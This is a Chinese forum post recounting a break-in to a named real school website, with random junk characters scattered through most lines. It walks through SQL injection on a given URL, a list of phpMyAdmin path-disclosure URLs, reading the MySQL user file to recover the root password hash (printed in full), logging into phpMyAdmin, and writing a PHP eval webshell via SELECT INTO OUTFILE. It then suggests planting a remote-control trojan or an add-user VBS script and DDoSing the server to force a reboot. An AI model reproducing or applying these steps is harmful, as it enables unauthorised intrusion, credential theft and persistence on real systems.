第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏* g2 k/ a/ ~( @% N
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!4 b( j* g3 X- \5 C7 Y" D4 O
2 H4 A- Z5 _+ E8 y
9 x( R, B- n |& m+ e }5 u0 x! e" w
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ; B$ z8 y6 {5 Y
4 @+ \' Y! E. o( j: S
那么想可以直接写入shell ,getshell有几个条件:
( a+ H8 A" A! l" J Y1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
; z. f: h4 z9 J' r7 F* ^2 ~- ~% f% K4 _# V& L' O
试着爆绝对路径:
2 ? J) o# l( G, \! I) n) _/ S, r1./phpMyAdmin/index.php?lang[]=1
) z8 N( k N- e) n0 j8 Q) s# [1 p2./phpMyAdmin/phpinfo.php 0 T' w& H$ I& K7 ?3 f- j* K; V
3./load_file()
( @3 {, V: R7 J/ Y1 h4./phpmyadmin/themes/darkblue_orange/layout.inc.php
/ s" `. i9 r$ ^! [5 y+ E5./phpmyadmin/libraries/select_lang.lib.php $ s o% k7 }7 u; k' ?% c! p* d' |" t
6./phpmyadmin/libraries/lect_lang.lib.php % |/ t* p% \0 h, B5 X2 C
7./phpmyadmin/libraries/mcrypt.lib.php 3 t# i' A( K7 a( z/ X
8./phpmyadmin/libraries/export/xls.php % y7 x8 g- ^ b, @; G
; b6 L, r7 ?# p: K3 P4 [
均不行........................... 0 c% Y" x/ ^% w# m1 X
5 ^- o7 D# ^( t. }* L御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 8 ]& V6 d& X: C& K5 W9 s9 K
# l1 @- P8 k7 h0 ]! S/ M; o0 U3 p
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
' D6 |6 E, Q; i1 g( \* I
+ \# R v- j, M3 \ y默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 # s( `7 I" a6 M2 G
9 n! Y$ D2 T1 i. C V9 t9 Y+ @3 N5 _
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
. w) _; J8 T! | h% A5 z) O- c4 G% r2 `
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell - M& {; T6 H6 S+ c1 M% L
) W2 t9 R/ d; L" c; W" F* [6 H
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
1 c& c! u) e$ m
' }$ J3 k+ O/ m& t- N# n自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
3 B3 R: v6 H; p5 f# c) F9 s
8 x9 b1 E k$ X _: F3 n. k成功读到root密码:
. @' ~, w: B# q; `) G
) X+ t/ ^+ C% Y. ]% {17---- r(0072) 4 [ x$ D0 R4 J5 x
18---- o(006f)
; U" @9 b; W5 l, {* ]+ S19---- o(006f)
! Y& p5 ^0 Q5 x, j20---- t(0074)
0 i1 B: J9 v' c# @. p; V. F21---- *(002a) 0 r$ e' V5 l$ R7 N7 z# V% ?5 w$ G
22---- 8(0038) 9 Y% C' f' P; e s# S
23---- 2(0032) 6 k: o% b& H$ b+ w; @2 c
24---- E(0045)
/ _) w+ n, J1 I/ R/ J25---- 1(0031) * o ]$ q6 l6 z0 U, W
26---- C(0043)
I0 S* w% Y& ~7 y27---- 5(0035) # D- w3 \5 O6 s, Q8 Z
28---- 8(0038) O4 ]- h& F, F9 ^4 K
29---- 2(0032)
% W3 L, T: V+ P) ~30---- 8(0038) # i& ^ I% W: D
31---- A(0041)
- l7 u$ M9 v5 ^2 i8 [( p. t z32---- 9(0039) 3 [+ b' M: r" r! Z( ~
33---- B(0042)
+ H) v' K7 o u4 d5 ^5 H) b5 L34---- 5(0035) 8 B* p7 n5 o8 x4 ]( g
35---- 4(0034)
5 b1 |4 l- j, S- U3 \6 }9 ]5 b36---- 8(0038)
1 m8 J5 Z& O+ [3 l( m37---- 6(0036)
! L/ M5 ~3 U% _8 e& E% P9 A5 p38---- 4(0034)
: o0 q- L/ @: \( _, g+ S39---- 9(0039) 1 X$ j n9 f! E. B) f: g
40---- 1(0031) : J% j/ p0 n8 l! [" k
41---- 1(0031) 5 @2 }! G& l0 a; F
42---- 5(0035)
/ R- p- C, l' O. P0 ]6 u43---- 3(0033)
8 j, I9 k6 ?/ B `6 B3 n) X44---- 5(0035)
: r; S) f" T2 V3 f' D6 ~* j45---- 9(0039) 6 _& n6 Q& o- q0 k2 k) S
46---- 8(0038)
2 Y6 h( F3 V* I$ o47---- F(0046)
1 {" W `4 M" j9 W0 \+ o48---- F(0046) ) u0 V: `6 k/ N& Z# t- y( _
49---- 4(0034) ( Z) Z' R: M8 w4 ]' \- h: Z2 J: |
50---- F(0046) , z4 ]3 s& T8 W3 `) m B6 K
51---- 0(0030) 7 S$ V. _* L: g; i7 s
52---- 3(0033)
2 }1 W# X$ c: c) `0 ]53---- 2(0032) . E9 j; }: K+ ]; Q5 w$ F0 E
54---- A(0041) + z. L A! |3 H: ~- @
55---- 4(0034)
$ T5 Y% J8 S3 i& Y3 e+ T# O56---- A(0041) " v5 G4 ] D) g! _& P/ l0 A- y7 A$ V
57---- B(0042) 5 b" b0 ?7 f% M2 B+ a) G
58---- *(0044)
9 [4 p* q5 R- x3 |- R! P59---- *(0035) / g) ^0 r% h4 Y I
60---- *(0041) ! ]7 ]6 `+ o; P2 c0 z1 @4 }2 ~2 R
61---- *0032)
! ^5 |% \8 r7 e5 a, ], ?5 l* }) e9 J* z. m R; r
解密后成功登陆phpmyamin ( B! B6 S9 j- G) `: x
" q4 [" u! w1 v7 r
+ y. ]; z& f& I; ^% X
' M" |% g! z- U7 E3 W* M1 K3 a' l* O x0 n) f+ l% i- a H N
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' / ]7 L$ c/ k& n( l9 h2 v" i
/ o2 f! I0 l- \5 Z9 f2 W& ^成功执行,拿下shell,菜刀连接:
# i# O, T$ L: H4 c; B/ K
3 ?# |* ~) W) |1 x7 C$ a, Q7 i服务器不支持asp,aspx,php提权无果................... ! \0 x6 h6 m( N+ l4 H3 d
X5 T2 D A5 z4 Z7 t9 G6 T
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: * l- R) k& A. `$ z+ @6 D
服务器上已经有个隐藏帐号了
5 H( K/ W. Z" W" x5 `别名 administrators1 V# y. c* \/ S- [
注释 管理员对计算机/域有不受限制的完全访问权 2 R7 {4 p: v0 _
成员 ! |6 R. X2 s. u+ l0 S, M
-------------------------------------------------------------------------------/ `1 B/ U" ^( F. I1 x, [. t; F. `
admin; c1 w2 O; N" {# x
Administrator
F, k$ M6 I E9 n' `slipper$
- A0 Q* ~" f6 o/ X1 r/ b6 o) w1 ssqluser
4 b7 P( ?& ]# \+ E7 u G命令成功完成。
5 ~8 u L* G2 y' M. d& N9 K& M5 O' n0 N, z, V X: I
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
% [) m& f+ Z- b, k8 `) K( y7 L5 ^' Q; M0 e% f
ddos服务器重启,不然就只能坐等服务器重启了...............................
3 K; ]5 r1 f& E2 i- _6 Y! a; v
7 b. ? I1 J0 k0 d5 b+ R; L* [4 c
5 n0 o9 K* D2 @: p% E" N | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
